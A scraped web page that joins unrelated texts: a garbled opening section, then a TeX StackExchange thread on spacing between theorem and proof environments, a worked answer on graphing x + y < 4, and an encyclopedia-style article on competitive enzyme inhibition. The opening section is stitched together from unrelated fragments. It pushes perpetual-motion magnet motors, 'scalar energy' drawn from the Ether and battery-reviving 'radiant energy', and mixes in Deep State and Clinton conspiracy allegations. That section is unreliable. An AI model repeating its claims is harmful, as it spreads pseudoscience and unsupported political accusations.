electronics-computer s100 times faster than silicon based computers, applying it to hospital walls because it is anti-bacterial, and Free Power myriad of other applications. kimseymd1Harvey1The purpose of my post is to debunk the idea of Free Power Magical Magnetic Motor. That is, Free Power motor that has no source of external power, and runs from the (non existent) power stored in permanent magnets. Advances made to electric motors in the past few years are truly amazing, but are totally outside the scope of my post.
“What is the reality of the universe? This question should be answered first, before the concept of God can be analyzed. Science is still in search of the basic entity that constructs the cosmos. God, therefore, would be a system too complex for science to discover. Unless the basic reality of aakaash (space) is recognized, neither science nor spirituality can have a grasp of the Creator, Sustainer and the Destroyer of this gigantic Phenomenon that the Vedas named as Brahman.” – Tewari, from his book, “Spiritual Foundations.”
OK, these events might be pathetic money grabs, but certainly, if some of the allegations against her were true, both groups would argue, would she not be behind bars by now? Suffice it to say, most people who have done any manner of research into the many allegations against her have concluded that while she is most likely a criminal, they just can't see her getting arrested. But if–and it's a big 'if'–she ever does get arrested and convicted of a serious crime, that likely would satisfy the most ardent skeptic and give rise to widespread belief that the Trump Administration is working on, and succeeding in, taking down the Deep State. Let's examine the possibility that things are headed in that direction.
There was one on youtube that claimed to put out 800w, but i don't know if that was true, and that still is not very much; that's why i was wondering if i could wire several PMAs in series to get whatever voltage i wanted. If you know how to wire them like that, then send me a diagram, both single phase and three phase. The heat problem with the 12 & 24v is mostly in the wiring: it needs large cables to carry power at that low a voltage, and there can't be much distance between the PMA and the batteries or there is power loss. It's just like running power from the house to a shop a good distance away on small wire: by the time the power gets to the end of the line it is weak, and it heats the line up. If you pull very many amps on a 12 or 24v system it heats up fast. Also, i don't know the metric system. All i know is wrenches and sockets; i am good old US measuring: inches, feet, yards, miles. the metric system is too complicated and i wish we were not switching over to it.
Of course such a motor (like the one described by you) would not spin at all, and is a stupid idea. The working examples (at least some of them) work on another principle/phenomenon. They don't use the attraction and repelling forces of the magnets as all of us know them. I repeat: that is a stupid idea. The magnets that repel each other would lose their strength in time, anyway. The idea is that in some configurations of the magnets a scalar energy vortex is created, with the role of drawing energy from the Ether, and this vortex is responsible for the extra energy or movement of the rotor. There are scalar energy detectors that can prove that this is happening. You can't detect scalar energy with conventional tools. The vortex is a ubiquitous thing in nature. But you don't know that, because you are living in an urbanized society and you lack direct interaction with natural phenomena. Most of the time people like you have no opportunity to observe Nature all day, and rely on one of two major fairy-tales to explain this world: religion or mainstream science. Magnetism is more than attraction and repelling forces. If you had studied some books related to magnetism (which don't even talk about free energy or magnetic motors) you would have known by now that magnetism is such a complex thing, with a lot of applications in a wide range of domains.
A former whistleblower, who spoke with agents from an FBI field office last year and worked for years as an undercover informant collecting information on Russia's nuclear energy industry for the bureau, noted his enormous frustration with the DOJ and FBI. He describes a two-tiered justice system that failed to actively investigate the information he provided years ago on the Clinton Foundation and Russia's dangerous meddling with the U.S. nuclear industry and energy industry during the Obama administration.
The high concentrations of A "push" the reaction series (A ⇌ B ⇌ C ⇌ D) to the right, while the low concentrations of D "pull" the reactions in the same direction. Providing a high concentration of a reactant can "push" a chemical reaction in the direction of products (that is, make it run in the forward direction to reach equilibrium). The same is true of rapidly removing a product, but with the low product concentration "pulling" the reaction forward. In a metabolic pathway, reactions can "push" and "pull" each other because they are linked by shared intermediates: the product of one step is the reactant for the next.
"Think of two powerful magnets: one fixed plate over a rotating disk, with one side parallel to the disk surface, and the other on a rotating plate connected to small gear G1. If the north side of the magnet over gear G1 is parallel to that of the one over the rotating disk, then they will repel each other. Now the magnet over the left disk will try to rotate the disk below in (say) the clockwise direction. Now there is another magnet at a certain angular distance on the rotating disk, on both sides of the magnet M1. Now the large gear G0 is connected directly to the rotating disk with a rod. So, after repulsion, if the rotating disk rotates it will rotate the gear G0, which is connected to gear G1. So the magnet over G1 rotates in the direction perpendicular to that of the fixed-disk surface. Now the angle and teeth ratio of G0 and G1 are such that when the magnet M1 moves through a certain angle, the other magnet which came into the position where M1 was will be repelled by the magnet of the fixed disk, as the magnet on the fixed disk has moved 360 degrees on the plate above gear G1. So if the first repulsion of magnets M1 and M0 is powerful enough to make the rotating disk rotate through that angle or more, the disk would rotate until an error occurs in the position of the disk, friction loss, or magnetic energy loss. The space between the two disks is just more than the width of magnets M0 and M1, plus the space needed for connecting gear G0 to the rotating disk with a rod. Now, I've not tested this with actual objects. When designing, you may think of losses, or may think that when the rotating disk rotates through that angle and magnet M0 is rotating clockwise on the plate over G2, then it may start to repel M1 after it has rotated only part of the way; the solution is to use more powerful magnets."
The device he built vibrated when it ran, and you had to spin it to start it, but me and him saw it run. Dad was a mechanic and a machinist. He later broke it up so no one would have his idea. I remember how it was made. The motor was amazing. Here's some more information. Run your motor on a higher voltage (multiple batteries in a series connection). Connect another old, worn out, totally dead battery in parallel to the battery that has the positive alligator clip. Place the positive 'run' cable on this dead battery, start the motor and bring it to maximum RPM, and connect the positive alligator clip to the same dead battery. Make sure the electrolyte is full in every cell. After two hours' run time, test the battery. If the radiant energy connections were done correctly, the dead battery will run like new. The RE breaks the calcification off the plates and restores the battery to full output, and you can use it like a new battery! After you burn the surface charge clean, place a battery tester on the battery. You'll be pleasantly surprised! Atomic bomb!?! Wow, there's a stretch! Let's take a ton of TNT and use it to split an atom and release the power already in that atom. Here's my question: now recycle that energy and explain how? A magnet motor is the single most efficient motor available. This is the only motor that starts using a battery, achieves maximum RPM, and then recharges and maintains the battery that started it. Radiant energy! Radiant energy is produced at every hydro-electric dam on the planet. They drive a lightning rod into the ground and dispose of it. RE cannot be used with circuitry or motors; it melts circuitry, and over-heats and melts motors. It runs regular light bulbs okay, but even they run damn hot! RE is accompanied by AC electricity and that doesn't help any either.
He is now Trump's Secretary of Labor, which is interesting because Trump has pledged to deal with the human sex trafficking issue. In his first month in office, the President said he was "prepared to bring the full force and weight of our government" to end human trafficking, and he signed an executive order directing federal law enforcement to prioritize dismantling the criminal organizations behind forced labor, sex trafficking, involuntary servitude and child exploitation. You can read more about that and the results that have been achieved here.
#### What is the name he gave it for research reasons? Thanks for the discussion. I appreciate the input. I assume you have investigated the claims and found none worthy of further research? What element of the idea is failing? If one is lucky enough to keep something rotating on its own, the drag of a crankshaft, or of an "alternator" producing electricity at the same time, seems like it would be too much to keep the motor running. Forget about discussing which type of battery it may charge or which vehicle it may power; the question is, does it work? No one anywhere in the world has ever gotten a magnetic motor to run, let alone power anything. If you invest in one and it seems to be taking a very long time to develop, it means one thing: you have been stung. Don't say you haven't been warned. As an optimist myself, I want to see it work and think it can. It would have to be more than self-sustaining, enough to recharge offline Li-Fe-nano-phosphate batteries.
“It wasn’t long before carriage makers were driving horseless carriages. It wasn’t long before people crossing the continent on trains abandoned the railroads for airliners. Natural gas is replacing coal, and there is nothing the railroads, the coal miners, or the coal companies can do about it. Cheaper and more efficient energy always wins out over more expensive energy. Coal replaced wood, and oil replaced coal as the primary source of energy. Anything that is more efficient boosts the figures on the bottom line of the ledger. Dollars chase efficiency. Inefficiency is suppressed by market forces. Efficiency wins in the market place.
|
|
# Vertical space between proof and theorem environments
When compiling my latex file, the space between the end of the theorem body and the word "Proof" appears to be a bit much. I know how to manage this individually using \vspace, but I want to change the settings in the preamble so that propositions, lemmas and corollaries also have the same vertical distance before the start of the proof. I have included my latex file here. Any help will be much appreciated.
\documentclass[12pt,a4paper]{article}
\usepackage[latin1]{inputenc}
\usepackage{amsfonts}
\usepackage{amssymb}
\usepackage[left=3.50cm, right=3.0cm, top=3.0cm, bottom=3.0cm]{geometry}
\usepackage{enumitem}
\usepackage{amsthm}
\usepackage{amsmath}
\setlength{\parskip}{5mm}
\setlength{\parindent}{0mm}
\setlength{\skip\footins}{1.6cm}
\setlength{\footnotesep}{0.5cm}
\newtheorem{thm}{Theorem}[section]
\newtheorem{lemma}[thm]{Lemma}
\newtheorem{proposition}[thm]{Proposition}
\newtheorem{cor}[thm]{Corollary}
\theoremstyle{definition}
\newtheorem{defn}[thm]{Definition}
\newtheorem{exmp}[thm]{Example}
\newtheorem{remark}[thm]{Remark}
\newcommand{\prn}{\mathrel{\mathrm{prn}}}
\begin{document}
\begin{thm}
Let $G$ be a group with subgroups $H$ and $K$. Then $[H,K] \unlhd \langle H, K\rangle$
\end{thm}
\begin{proof}
Every element in $[H,K]$ belongs to $\langle H, K \rangle$ because of the way in which the elements of $\langle H, K \rangle$ are defined.
\end{proof}
\end{document}
• Could you please post a minimal working example of the code you are using, so that everyone can know which packages are at stake? – mvienney Mar 7 '17 at 17:52
• @mvienney I have edited my post to reflect what I need. – R Maharaj Mar 7 '17 at 18:05
You save 10pt of vertical spacing with the ntheorem defaults:
\documentclass[12pt,a4paper]{article}
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{amsfonts, amssymb}
\usepackage[left=3.50cm, right=3.0cm, top=3.0cm, bottom=3.0cm]{geometry}
\usepackage{enumitem}
\usepackage{amsmath}
\setlength{\parskip}{5mm}
\setlength{\parindent}{0mm}
\setlength{\skip\footins}{1.6cm}
\setlength{\footnotesep}{0.5cm}
\usepackage[amsmath, thmmarks]{ntheorem}
\theoremstyle{plain}
\theorembodyfont{\itshape}
\newtheorem{thm}{Theorem}[section]
\newtheorem{lemma}[thm]{Lemma}
\newtheorem{proposition}[thm]{Proposition}
\newtheorem{cor}[thm]{Corollary}
\theorembodyfont{\normalfont}
\newtheorem{defn}[thm]{Definition}
\newtheorem{exmp}[thm]{Example}
\newtheorem{remark}[thm]{Remark}
\theoremstyle{nonumberplain}
\theoremsymbol{ \ensuremath{\Box}}
\newtheorem{proof}{Proof}
\newcommand{\prn}{\mathrel{\mathrm{prn}}}
\begin{document}
\begin{thm}
Let $G$ be a group with subgroups $H$ and $K$. Then $[H,K] \unlhd \langle H, K\rangle$.
\end{thm}
%
\begin{proof}
Every element in $[H,K]$ belongs to $\langle H, K \rangle$ because of the way in which the elements of $\langle H, K \rangle$ are defined.
\end{proof}
%
\begin{defn}
A trivial definition
\end{defn}
\end{document}
• This looks really good, but how can I prevent the word "Theorem" from being italicized? – R Maharaj Mar 8 '17 at 5:49
• @R Maharaj: Please see my updated answer. – Bernard Mar 8 '17 at 9:45
\documentclass{article}
\usepackage{amsthm}
\usepackage{thmtools,blindtext}
\declaretheorem{theorem}
\declaretheoremstyle[%
spaceabove=3pt,%reduce or increase between theorem and proof
spacebelow=20pt,%reduce or increase
qed=\qedsymbol%
]{mystyle}
\declaretheorem[name={Proof},style=mystyle,unnumbered,
]{pf}
\begin{document}
\begin{theorem}
\blindtext
\end{theorem}
\begin{pf}
BLAAAAAAAAAAAAAAAAAAAAAAA
\end{pf}
\begin{theorem}
\blindtext
\end{theorem}
\textbf{Normal}
\begin{proof}
\blindtext
\end{proof}
\end{document}
• the settings in amsthm for the space between theorem and proof assume that the default baselines and \parskip will not be changed. this answer redefines these to be fixed distances. those values may or may not be appropriate if the \linespread or \parskip is changed. they also don't allow any stretch if a page is broken "short" because of an unbreakable element (e.g., a math display) that doesn't fit and must be moved to the next page. – barbara beeton Mar 7 '17 at 18:31
|
|
# How do you graph the inequality x + y < 4?
Mar 22, 2016
Graph and solve linear inequality.
#### Explanation:
x + y < 4
First, graph the line x + y = 4 by its two intercepts.
Make x = 0 --> y = 4
Make y = 0 --> x = 4
The solution set of the inequality is the area below the line.
Check with the origin.
Replace x = 0 and y = 0 into the inequality, we get: -> 0 < 4.
It is true, so the origin O is inside the solution set.
graph{x + y = 4 [-10, 10, -5, 5]}
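A small Python/matplotlib sketch of the same steps (the library and the plotting window are my choice, not part of the original answer): draw the boundary line, then shade the half-plane that the origin test picks out.

```python
import numpy as np
import matplotlib.pyplot as plt

x = np.linspace(-10, 10, 200)
y = 4 - x                              # boundary line x + y = 4

plt.plot(x, y, label="x + y = 4")
plt.fill_between(x, -5, y, alpha=0.3, label="x + y < 4")  # region below the line
plt.scatter([0], [0], color="k")       # origin check: 0 + 0 < 4, so inside
plt.xlim(-10, 10)
plt.ylim(-5, 5)
plt.legend()
plt.show()
```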
|
|
# Competitive inhibition
Competitive inhibition is interruption of a chemical pathway owing to one chemical substance inhibiting the effect of another by competing with it for binding or bonding. Any metabolic or chemical messenger system can potentially be affected by this principle, but several classes of competitive inhibition are especially important in biochemistry and medicine, including the competitive form of enzyme inhibition, the competitive form of receptor antagonism, the competitive form of antimetabolite activity, and the competitive form of poisoning (which can include any of the aforementioned types).
In competitive inhibition of enzyme catalysis, binding of an inhibitor prevents binding of the target molecule of the enzyme, also known as the substrate.[1] This is accomplished by blocking the binding site of the substrate – the active site – by some means. The Vmax indicates the maximum velocity of the reaction, while the Km is the amount of substrate needed to reach half of the Vmax. Km also plays a part in indicating the tendency of the substrate to bind the enzyme.[2] Competitive inhibition can be overcome by adding more substrate to the reaction, which increases the chances of the enzyme and substrate binding. As a result, competitive inhibition alters only the Km, leaving the Vmax the same.[3] This can be demonstrated using enzyme kinetics plots such as the Michaelis-Menten or the Lineweaver-Burk plot. Once the inhibitor is bound to the enzyme, the slope will be affected, as the Km either increases or decreases from the original Km of the reaction.[4][5][6]
Most competitive inhibitors function by binding reversibly to the active site of the enzyme.[1] As a result, many sources state that this is the defining feature of competitive inhibitors.[7] This, however, is a misleading oversimplification, as there are many possible mechanisms by which an enzyme may bind either the inhibitor or the substrate but never both at the same time.[1] For example, allosteric inhibitors may display competitive, non-competitive, or uncompetitive inhibition.[1]
## Mechanism
Diagram showing competitive inhibition
In competitive inhibition, an inhibitor that resembles the normal substrate binds to the enzyme, usually at the active site, and prevents the substrate from binding.[8] At any given moment, the enzyme may be bound to the inhibitor, the substrate, or neither, but it cannot bind both at the same time. During competitive inhibition, the inhibitor and substrate compete for the active site. The active site is a region on an enzyme to which a particular protein or substrate can bind. The active site allows only one of the two to bind at a time, thereby either permitting a reaction to occur or preventing it. In competitive inhibition, the inhibitor resembles the substrate and takes its place, binding to the active site of the enzyme. Increasing the substrate concentration diminishes the "competition" for the substrate to properly bind to the active site and allow a reaction to occur.[3] When the substrate is at a higher concentration than the competitive inhibitor, it is more likely that the substrate will come into contact with the enzyme's active site than the inhibitor.
Competitive inhibitors are commonly used to make pharmaceuticals.[3] For example, methotrexate is a chemotherapy drug that acts as a competitive inhibitor. It is structurally similar to the coenzyme folate, which binds to the enzyme dihydrofolate reductase.[3] This enzyme is part of the synthesis of DNA and RNA, and when methotrexate binds the enzyme, it renders it inactive, so it cannot synthesize DNA and RNA.[3] Thus, the cancer cells are unable to grow and divide. Another example involves prostaglandins, which are made in large amounts as a response to pain and can cause inflammation. Prostaglandins are synthesized from essential fatty acids, and when this was discovered it turned out that certain fatty acids are actually very good inhibitors of prostaglandin production. These fatty acid inhibitors have been used as drugs to relieve pain because they can act as the substrate, bind to the enzyme, and block prostaglandin production.[9]
An example of non-drug related competitive inhibition is in the prevention of browning of fruits and vegetables. For example, tyrosinase, an enzyme within mushrooms, normally binds to the substrate, monophenols, and forms brown o-quinones.[10] Competitive substrates, such as 4-substituted benzaldehydes for mushrooms, compete with the substrate lowering the amount of the monophenols that bind. These inhibitory compounds added to the produce keep it fresh for longer periods of time by decreasing the binding of the monophenols that cause browning.[10] This allows for an increase in produce quality as well as shelf life.
Competitive inhibition can be reversible or irreversible. If it is reversible inhibition, then effects of the inhibitor can be overcome by increasing substrate concentration.[8] If it is irreversible, the only way to overcome it is to produce more of the target (and typically degrade and/or excrete the irreversibly inhibited target).
In virtually every case, competitive inhibitors bind in the same binding site (active site) as the substrate, but same-site binding is not a requirement. A competitive inhibitor could bind to an allosteric site of the free enzyme and prevent substrate binding, as long as it does not bind to the allosteric site when the substrate is bound. For example, strychnine acts as an allosteric inhibitor of the glycine receptor in the mammalian spinal cord and brain stem. Glycine is a major post-synaptic inhibitory neurotransmitter with a specific receptor site. Strychnine binds to an alternate site that reduces the affinity of the glycine receptor for glycine, resulting in convulsions due to lessened inhibition by the glycine.[11]
In competitive inhibition, the maximum velocity (${\displaystyle V_{\max }}$) of the reaction is unchanged, while the apparent affinity of the substrate to the binding site is decreased (the ${\displaystyle K_{d}}$ dissociation constant is apparently increased). The change in ${\displaystyle K_{m}}$ (Michaelis-Menten constant) is parallel to the alteration in ${\displaystyle K_{d}}$, as one increases the other must decrease. When a competitive inhibitor is bound to an enzyme the ${\displaystyle K_{m}}$ increases. This means the binding affinity for the enzyme is decreased, but it can be overcome by increasing the concentration of the substrate.[12] Any given competitive inhibitor concentration can be overcome by increasing the substrate concentration. In that case, the substrate will reduce the availability for an inhibitor to bind, and, thus, outcompete the inhibitor in binding to the enzyme.[12]
Competitive inhibition can also be allosteric, as long as the inhibitor and the substrate cannot bind the enzyme at the same time.
### Biological examples
After an accidental ingestion of the contaminated opioid drug desmethylprodine, the neurotoxic effect of 1-methyl-4-phenyl-1,2,3,6-tetrahydropyridine (MPTP) was discovered. MPTP is able to cross the blood brain barrier and enter acidic lysosomes.[13] MPTP is biologically activated by MAO-B, an isozyme of monoamine oxidase (MAO) which is mainly implicated in neurological disorders and diseases.[14] Later, it was discovered that MPTP causes symptoms similar to those of Parkinson's disease. Cells in the central nervous system (astrocytes) include MAO-B that oxidizes MPTP to 1-methyl-4-phenylpyridinium (MPP+), which is toxic.[13] MPP+ eventually travels to the extracellular fluid by a dopamine transporter, which ultimately causes the Parkinson's symptoms. However, competitive inhibition of the MAO-B enzyme or the dopamine transporter protects against the oxidation of MPTP to MPP+. A few compounds have been tested for their ability to inhibit oxidation of MPTP to MPP+, including methylene blue, 5-nitroindazole, norharman, 9-methylnorharman, and menadione.[14] These demonstrated a reduction of neurotoxicity produced by MPTP.
Michaelis-Menten plot of the reaction velocity (v) against substrate concentration [S] of normal enzyme activity (1) compared to enzyme activity with a competitive inhibitor (2). Adding a competitive inhibitor to an enzymatic reaction increases the Km of the reaction, but the Vmax remains the same.
Lineweaver-Burk plot, the reciprocal of the Michaelis-Menten plot, of the reciprocal of velocity (1/V) vs the reciprocal of the substrate concentration (1/[S]) of normal enzyme activity (blue) compared to enzyme activity with a competitive inhibitor (red). Adding a competitive inhibitor to an enzymatic reaction increases the Km of the reaction, but the Vmax remains the same.
Sulfa drugs also act as competitive inhibitors. For example, sulfanilamide competitively binds to the enzyme in the dihydropteroate synthase (DHPS) active site by mimicking the substrate para-aminobenzoic acid (PABA).[15] This prevents the substrate itself from binding which halts the production of folic acid, an essential nutrient. Bacteria must synthesize folic acid because they do not have a transporter for it. Without folic acid, bacteria cannot grow and divide. Therefore, because of sulfa drugs' competitive inhibition, they are excellent antibacterial agents. An example of competitive inhibition was demonstrated experimentally for the enzyme succinic dehydrogenase, which catalyzes the oxidation of succinate to fumarate in the Krebs cycle. Malonate is a competitive inhibitor of succinic dehydrogenase. The binding of succinic dehydrogenase to the substrate, succinate, is competitively inhibited. This happens because malonate's chemistry is similar to succinate. Malonate's ability to inhibit binding of the enzyme and substrate is based on the ratio of malonate to succinate. Malonate binds to the active site of succinic dehydrogenase so that succinate cannot. Thus, it inhibits the reaction.[16]
Another possible mechanism for allosteric competitive inhibition.
## Equation
The Michaelis-Menten Model can be an invaluable tool for understanding enzyme kinetics. According to this model, a plot of the reaction velocity (V0) against the concentration [S] of the substrate can be used to determine values such as Vmax, the initial velocity, and Km (the substrate concentration at Vmax/2, a measure of the affinity of the enzyme for the substrate).[4]
Competitive inhibition increases the apparent value of the Michaelis-Menten constant, ${\displaystyle K_{m}^{\text{app}}}$, such that initial rate of reaction, ${\displaystyle V_{0}}$, is given by
${\displaystyle V_{0}={\frac {V_{\max }\,[S]}{K_{m}^{\text{app}}+[S]}}}$
where ${\displaystyle K_{m}^{\text{app}}=K_{m}(1+[I]/K_{i})}$, ${\displaystyle K_{i}}$ is the inhibitor's dissociation constant and ${\displaystyle [I]}$ is the inhibitor concentration.
${\displaystyle V_{\max }}$ remains the same because the presence of the inhibitor can be overcome by higher substrate concentrations. ${\displaystyle K_{m}^{\text{app}}}$, the substrate concentration that is needed to reach ${\displaystyle V_{\max }/2}$, increases with the presence of a competitive inhibitor. This is because the concentration of substrate needed to reach ${\displaystyle V_{\max }}$ with an inhibitor is greater than the concentration of substrate needed to reach ${\displaystyle V_{\max }}$ without an inhibitor.
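A small Python sketch of these relations (the function name and sample constants are illustrative assumptions, not values from the article) shows the competitive signature: the apparent Km grows with [I], while the limiting rate does not change.

```python
def v0(S, Vmax, Km, I=0.0, Ki=1.0):
    """Michaelis-Menten initial rate with a competitive inhibitor:
    only Km is rescaled, to Km_app = Km * (1 + [I]/Ki)."""
    Km_app = Km * (1.0 + I / Ki)
    return Vmax * S / (Km_app + S)

# Illustrative constants: Vmax = 100, Km = 2, Ki = 0.5, [I] = 1.
for S in (1.0, 10.0, 1000.0):
    print(S, v0(S, 100, 2), v0(S, 100, 2, I=1.0, Ki=0.5))
# At large [S] the two rates converge: Vmax is unchanged, only Km_app grows.
```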
## Derivation
In the simplest case of a single-substrate enzyme obeying Michaelis-Menten kinetics, the typical scheme
${\displaystyle {\ce {E + S <=>[k_1][k_{-1}] ES ->[k_2] E + P}}}$
is modified to include binding of the inhibitor to the free enzyme:
${\displaystyle {\ce {EI + S <=>[k_{-3}][k_3] E + S + I <=>[k_1][k_{-1}] ES + I ->[k_2] E + P + I}}}$
Note that the inhibitor does not bind to the ES complex and the substrate does not bind to the EI complex. It is generally assumed that this behavior is indicative of both compounds binding at the same site, but that is not strictly necessary. As with the derivation of the Michaelis-Menten equation, assume that the system is at steady-state, i.e. the concentration of each of the enzyme species is not changing.
${\displaystyle {\frac {d[{\ce {E}}]}{dt}}={\frac {d[{\ce {ES}}]}{dt}}={\frac {d[{\ce {EI}}]}{dt}}=0.}$
Furthermore, the known total enzyme concentration is ${\displaystyle [{\ce {E}}]_{0}=[{\ce {E}}]+[{\ce {ES}}]+[{\ce {EI}}]}$, and the velocity is measured under conditions in which the substrate and inhibitor concentrations do not change substantially and an insignificant amount of product has accumulated.
We can therefore set up a system of equations:
${\displaystyle [{\ce {E}}]_{0}=[{\ce {E}}]+[{\ce {ES}}]+[{\ce {EI}}]}$
(1)
${\displaystyle {\frac {d[{\ce {E}}]}{dt}}=0=-k_{1}[{\ce {E}}][{\ce {S}}]+k_{-1}[{\ce {ES}}]+k_{2}[{\ce {ES}}]-k_{3}[{\ce {E}}][{\ce {I}}]+k_{-3}[{\ce {EI}}]}$
(2)
${\displaystyle {\frac {d[{\ce {ES}}]}{dt}}=0=k_{1}[{\ce {E}}][{\ce {S}}]-k_{-1}[{\ce {ES}}]-k_{2}[{\ce {ES}}]}$
(3)
${\displaystyle {\frac {d[{\ce {EI}}]}{dt}}=0=k_{3}[{\ce {E}}][{\ce {I}}]-k_{-3}[EI]}$
(4)
where ${\displaystyle {\ce {[S], [I]}}}$ and ${\displaystyle {\ce {[E]_0}}}$ are known. The initial velocity is defined as ${\displaystyle V_{0}=d[{\ce {P}}]/dt=k_{2}[{\ce {ES}}]}$, so we need to define the unknown ${\displaystyle {\ce {[ES]}}}$ in terms of the knowns ${\displaystyle {\ce {[S], [I]}}}$ and ${\displaystyle {\ce {[E]_0}}}$.
From equation (3), we can define E in terms of ES by rearranging to
${\displaystyle k_{1}[{\ce {E}}][{\ce {S}}]=(k_{-1}+k_{2})[{\ce {ES}}]}$
Dividing by ${\displaystyle k_{1}[{\ce {S}}]}$ gives
${\displaystyle [{\ce {E}}]={\frac {(k_{-1}+k_{2})[{\ce {ES}}]}{k_{1}[{\ce {S}}]}}}$
As in the derivation of the Michaelis-Menten equation, the term ${\displaystyle (k_{-1}+k_{2})/k_{1}}$ can be replaced by the macroscopic rate constant ${\displaystyle K_{m}}$:
${\displaystyle [{\ce {E}}]={\frac {K_{m}[{\ce {ES}}]}{\ce {[S]}}}}$
(5)
Substituting equation (5) into equation (4), we have
${\displaystyle 0={\frac {k_{3}[{\ce {I}}]K_{m}[{\ce {ES}}]}{\ce {[S]}}}-k_{-3}[{\ce {EI}}]}$
Rearranging, we find that
${\displaystyle [{\ce {EI}}]={\frac {K_{m}k_{3}[{\ce {I}}][{\ce {ES}}]}{k_{-3}[{\ce {S}}]}}}$
At this point, we can define the dissociation constant for the inhibitor as ${\displaystyle K_{i}=k_{-3}/k_{3}}$, giving
${\displaystyle [{\ce {EI}}]={\frac {K_{m}[{\ce {I}}][{\ce {ES}}]}{K_{i}[{\ce {S}}]}}}$
(6)
At this point, substitute equation (5) and equation (6) into equation (1):
${\displaystyle [{\ce {E}}]_{0}={\frac {K_{m}[{\ce {ES}}]}{\ce {[S]}}}+[{\ce {ES}}]+{\frac {K_{m}[{\ce {I}}][{\ce {ES}}]}{K_{i}[{\ce {S}}]}}}$
Rearranging to solve for ES, we find
${\displaystyle [{\ce {E}}]_{0}=[{\ce {ES}}]\left({\frac {K_{m}}{\ce {[S]}}}+1+{\frac {K_{m}[{\ce {I}}]}{K_{i}[{\ce {S}}]}}\right)=[{\ce {ES}}]{\frac {K_{m}K_{i}+K_{i}[{\ce {S}}]+K_{m}[{\ce {I}}]}{K_{i}[{\ce {S}}]}}}$
${\displaystyle [{\ce {ES}}]={\frac {K_{i}[{\ce {S}}][{\ce {E}}]_{0}}{K_{m}K_{i}+K_{i}[{\ce {S}}]+K_{m}[{\ce {I}}]}}}$
(7)
Returning to our expression for ${\displaystyle V_{0}}$, we now have:
${\displaystyle V_{0}=k_{2}[{\ce {ES}}]={\frac {k_{2}K_{i}[{\ce {S}}][{\ce {E}}]_{0}}{K_{m}K_{i}+K_{i}[{\ce {S}}]+K_{m}[{\ce {I}}]}}}$
${\displaystyle V_{0}={\frac {k_{2}[{\ce {E}}]_{0}[{\ce {S}}]}{K_{m}+[{\ce {S}}]+K_{m}{\frac {[{\ce {I}}]}{K_{i}}}}}}$
Since the velocity is maximal when all the enzyme is bound as the enzyme-substrate complex, ${\displaystyle V_{\max }=k_{2}[{\ce {E}}]_{0}}$. Replacing and combining terms finally yields the conventional form:
${\displaystyle V_{0}={\frac {V_{\max }[{\ce {S}}]}{K_{m}\left(1+{\frac {[{\ce {I}}]}{K_{i}}}\right)+[{\ce {S}}]}}}$
(8)
To compute the concentration of competitive inhibitor ${\displaystyle {\ce {[I]}}}$ that yields a fraction ${\displaystyle f_{V{_{0}}}}$ of velocity ${\displaystyle V_{0}}$, where ${\displaystyle 0<f_{V_{0}}<1}$:
${\displaystyle [{\ce {I}}]=\left({\frac {1}{f_{V{_{0}}}}}-1\right)K_{i}\left(1+{\frac {[{\ce {S}}]}{K_{m}}}\right)}$
(9)
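As a numerical illustration of equation (9) (the function name and sample values are assumptions for the example):

```python
def inhibitor_conc(f, Ki, S, Km):
    """[I] that reduces the initial rate to a fraction f (0 < f < 1)
    of the uninhibited rate at the same substrate concentration."""
    return (1.0 / f - 1.0) * Ki * (1.0 + S / Km)

# [I] needed to halve the rate when Ki = 0.5 and [S] = Km = 2:
print(inhibitor_conc(0.5, Ki=0.5, S=2.0, Km=2.0))  # 1.0
```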
## Notes and references
1. ^ a b c d "Types of Inhibition". NIH Center for Translational Therapeutics. Archived from the original on 8 September 2011. Retrieved 2 April 2012.
2. ^ Lodish, Harvey; Berk, Arnold; Zipursky, S. Lawrence; Matsudaira, Paul; Baltimore, David; Darnell, James (2000). "Functional Design of Proteins". Molecular Cell Biology. 4th Edition.
3. Berg, Jeremy M.; Tymoczko, John L.; Stryer, Lubert (2002). "Enzymes Can Be Inhibited by Specific Molecules". Biochemistry. 5th Edition.
4. ^ a b Berg, Jeremy M.; Tymoczko, John L.; Stryer, Lubert (2002). "The Michaelis-Menten Model Accounts for the Kinetic Properties of Many Enzymes". Biochemistry. 5th Edition.
5. ^ Eadie, S. G. (1942). "The Inhibition of Cholinesterase by Physostigmine and Prostigmine". Journal of Biological Chemistry. 146: 85–93.
6. ^ Berg, Jeremy M.; Tymoczko, John L.; Stryer, Lubert (2002). "Appendix: Vmax and KM Can Be Determined by Double-Reciprocal Plots". Biochemistry. 5th Edition.
7. ^ Ophardt, Charles. "Virtual Chembook". Elmhurst College. Retrieved 1 September 2015.
8. ^ a b "Map: Biochemistry Free & Easy (Ahern and Rajagopal)". Biology LibreTexts. 24 December 2014. Retrieved 2 November 2017.
9. ^ Flower, Roderick J. (1 March 1974). "Drugs Which Inhibit Prostaglandin Biosynthesis". Pharmacological Reviews. 26 (1): 33–67. ISSN 0031-6997. PMID 4208101.
10. ^ a b Jiménez, Mercedes; Chazarra, Soledad; Escribano, Josefa; Cabanes, Juana; García-Carmona, Francisco (2001). "Competitive Inhibition of Mushroom Tyrosinase by 4-Substituted Benzaldehydes". Journal of Agricultural and Food Chemistry. 49 (8): 4060–4063. doi:10.1021/jf010194h.
11. ^ Dick RM (2011). "Chapter 2. Pharmacodynamics: The Study of Drug Action". In Ouellette R, Joyce JA (eds.). Pharmacology for Nurse Anesthesiology. Jones & Bartlett Learning. ISBN 978-0-7637-8607-6.
12. ^ a b Donald, Voet (29 February 2016). Fundamentals of biochemistry : life at the molecular level. Voet, Judith G.,, Pratt, Charlotte W. (Fifth ed.). Hoboken, NJ. ISBN 9781118918401. OCLC 910538334.
13. ^ a b Sian, J.; Youdim, M. B. H.; Riederer, P.; Gerlach, M. (1999). "MPTP-Induced Parkinsonian Syndrome". Basic Neurochemistry: Molecular, Cellular and Medical Aspects. 6th Edition.
14. ^ a b Herraiz, T; Guillén, H (August 2011). "Inhibition of the bioactivation of the neurotoxin MPTP by antioxidants, redox agents and monoamine oxidase inhibitors". Food and Chemical Toxicology. 49 (4): 1773–1781. doi:10.1016/j.fct.2011.04.026. hdl:10261/63126. PMID 21554916.
15. ^ "How Sulfa Drugs Work". National Institutes of Health (NIH). 15 May 2015. Retrieved 2 November 2017.
16. ^ Potter, V. R.; DuBois, K. P. (20 March 1943). "Studies on the mechanism of hydrogen transport in animal tissues". The Journal of General Physiology. 26 (4): 391–404. doi:10.1085/jgp.26.4.391. ISSN 0022-1295. PMC 2142566. PMID 19873352.
|
|
